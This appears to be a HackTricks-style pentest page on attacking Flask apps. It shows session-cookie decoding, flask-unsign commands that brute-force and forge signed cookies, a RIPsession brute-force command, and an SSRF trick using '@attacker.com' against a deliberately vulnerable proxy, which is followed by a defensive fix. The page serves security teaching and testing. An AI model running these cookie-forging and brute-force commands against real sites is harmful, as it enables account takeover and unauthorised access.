# Flask
{{#include ../../banners/hacktricks-training.md}}
If you are playing a CTF, a Flask application will probably be involved in SSTI.
## Cookies
The default session cookie name is `session`.
### Decoder
Online Flask cookie decoder: https://www.kirsle.net/wizards/flask-session.cgi
#### Manual
Take the first part of the cookie (up to the first dot) and Base64-decode it:

```bash
echo "ImhlbGxvIg" | base64 -d
```

The cookie is also signed with a secret (the application's `SECRET_KEY`), so its payload can be read by anyone but cannot be altered without that secret.
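As an added example (not code from the original page or from any of the tools it lists), the following stdlib-only Python does what the manual decode above does and also checks the signature, mirroring the format Flask produces through itsdangerous: a base64url JSON payload (zlib-compressed when prefixed with `.`), a base64url big-endian timestamp, and an HMAC-SHA1 whose key is derived from the secret and the salt `cookie-session`. The function names are my own, the sample cookie is the one used in the decode command further down this page, and `CHANGEME` is a constructed secret, not a real one.

```python
import base64
import hashlib
import hmac
import json
import time
import zlib

# Flask's session cookie is an itsdangerous URLSafeTimedSerializer token:
#   <payload>.<timestamp>.<signature>
# payload   : base64url JSON, '=' padding stripped, prefixed with '.' when zlib-compressed
# timestamp : base64url big-endian integer (seconds since the epoch)
# signature : base64url HMAC-SHA1 over "<payload>.<timestamp>" using
#             key = HMAC-SHA1(secret_key, b"cookie-session")
SALT = b"cookie-session"


def _b64decode(segment: str) -> bytes:
    """base64url-decode one segment, restoring the '=' padding Flask strips."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def _b64encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def decode_session(cookie: str) -> dict:
    """Read payload and issue time. No secret is needed: the data is signed, not encrypted."""
    compressed = cookie.startswith(".")
    payload_b64, ts_b64, _sig_b64 = cookie.lstrip(".").split(".")
    raw = _b64decode(payload_b64)
    if compressed:
        raw = zlib.decompress(raw)
    issued_at = int.from_bytes(_b64decode(ts_b64), "big")
    return {"data": json.loads(raw), "issued_at": issued_at}


def _derived_key(secret: str) -> bytes:
    # itsdangerous key_derivation="hmac": the signing key is HMAC(secret, salt)
    return hmac.new(secret.encode(), SALT, hashlib.sha1).digest()


def verify_session(cookie: str, secret: str) -> bool:
    """True only when the signature was produced with this secret (the app's SECRET_KEY)."""
    signed_part, sig_b64 = cookie.rsplit(".", 1)
    expected = hmac.new(_derived_key(secret), signed_part.encode("ascii"), hashlib.sha1).digest()
    return hmac.compare_digest(expected, _b64decode(sig_b64))


def sign_session(data: dict, secret: str, issued_at=None) -> str:
    """Build a cookie the way Flask does (uncompressed), so verify_session() can be exercised offline."""
    raw = json.dumps(data, separators=(",", ":")).encode()
    issued_at = issued_at if issued_at is not None else int(time.time())
    ts_bytes = issued_at.to_bytes((issued_at.bit_length() + 7) // 8 or 1, "big")
    signed_part = f"{_b64encode(raw)}.{_b64encode(ts_bytes)}"
    sig = hmac.new(_derived_key(secret), signed_part.encode("ascii"), hashlib.sha1).digest()
    return f"{signed_part}.{_b64encode(sig)}"


if __name__ == "__main__":
    # Sample cookie taken from the flask-unsign decode command on this page.
    captured = "eyJsb2dnZWRfaW4iOmZhbHNlfQ.XDuWxQ.E2Pyb6x3w-NODuflHoGnZOEpbH8"
    print(decode_session(captured))                      # payload and issue time, no secret needed
    print(verify_session(captured, "CHANGEME"))          # constructed secret; result depends on the real key
    fresh = sign_session({"logged_in": True}, "CHANGEME")
    print(verify_session(fresh, "CHANGEME"), verify_session("f" + fresh[1:], "CHANGEME"))
```

The split between `decode_session` and `verify_session` is the point: decoding needs nothing, so never put secrets in the session payload; integrity rests entirely on the HMAC, so a guessable `SECRET_KEY` is equivalent to no signature at all.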
## Flask-Unsign
Command-line tool to fetch, decode, brute-force and craft session cookies of a Flask application by guessing secret keys.
{{#ref}}
https://pypi.org/project/flask-unsign/
{{#endref}}

```bash
pip3 install flask-unsign
```
#### Decode Cookie

```bash
flask-unsign --decode --cookie 'eyJsb2dnZWRfaW4iOmZhbHNlfQ.XDuWxQ.E2Pyb6x3w-NODuflHoGnZOEpbH8'
```
#### Brute Force

```bash
flask-unsign --wordlist /usr/share/wordlists/rockyou.txt --unsign --cookie '<cookie>' --no-literal-eval
```
#### Sign

```bash
flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME'
```
#### Sign using legacy (old version)

```bash
flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME' --legacy
```
## RIPsession

Command-line tool to brute-force websites using cookies crafted with flask-unsign.

{{#ref}}
https://github.com/Tagvi/ripsession
{{#endref}}

```bash
ripsession -u 10.10.11.100 -c "{'logged_in': True, 'username': 'changeMe'}" -s password123 -f "user doesn't exist" -w wordlist.txt
```
## SQLi in Flask session cookie with SQLmap

This example uses the sqlmap `eval` option to automatically sign sqlmap payloads for Flask using a known secret.
## Flask Proxy to SSRF

In this writeup it is explained how Flask allows a request starting with the character "@":

```http
GET @/ HTTP/1.1
Host: target.com
Connection: close
```

In the following scenario:
```python
from flask import Flask
from requests import get

app = Flask('__main__')
SITE_NAME = 'https://google.com/'

@app.route('/', defaults={'path': ''})
@app.route('/<path:path>')
def proxy(path):
    # the user-controlled path is concatenated into the upstream URL unchecked
    return get(f'{SITE_NAME}{path}').content

app.run(host='0.0.0.0', port=8080)
```
This could allow introducing something like "@attacker.com" to cause an SSRF.
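As an added example (not part of the original page or of the writeup it refers to), here is the check that closes this hole: instead of trusting the concatenated string, parse the URL the HTTP client would actually request and refuse it when the scheme, host or port differ from the configured upstream, or when a `user@` userinfo part has appeared. The function name `build_upstream_url` is my own; the Flask route under `__main__` is the page's proxy with that check placed in front of the outbound request.

```python
from urllib.parse import urlsplit


def build_upstream_url(base: str, path: str):
    """Return base+path if it still points at base's origin, otherwise None.

    The proxy on the page forwards f'{SITE_NAME}{path}' unchecked. Here the same
    string is parsed the way the HTTP client parses it: an '@' that turns the
    intended host into userinfo ('https://google.com@attacker.com'), or anything
    else that moves scheme, host or port, is rejected.
    """
    candidate = f"{base}{path}"
    try:
        allowed = urlsplit(base)
        parts = urlsplit(candidate)
        # .port raises ValueError on a non-numeric port, so it stays inside the try
        origin = (parts.scheme, parts.hostname, parts.port)
        expected = (allowed.scheme, allowed.hostname, allowed.port)
    except ValueError:  # malformed netloc, e.g. unbalanced IPv6 brackets or bad port
        return None
    if parts.username is not None or parts.password is not None:
        return None  # credentials in the netloc always mean the host was rewritten
    if origin != expected:
        return None
    return candidate


if __name__ == "__main__":
    # Same proxy as on the page, with the origin check in front of the outbound request.
    from flask import Flask, abort
    from requests import get

    app = Flask(__name__)
    SITE_NAME = 'https://google.com/'

    @app.route('/', defaults={'path': ''})
    @app.route('/<path:path>')
    def proxy(path):
        target = build_upstream_url(SITE_NAME, path)
        if target is None:
            abort(400)  # log and refuse; do not "fix up" the URL and forward it anyway
        return get(target).content

    app.run(host='127.0.0.1', port=8080)
```

Comparing parsed components rather than searching the raw path for "@" is deliberate: a literal "@" inside a path is harmless, whereas the dangerous case is the one where the parser ends up with a different `hostname`, and that is exactly what the check compares.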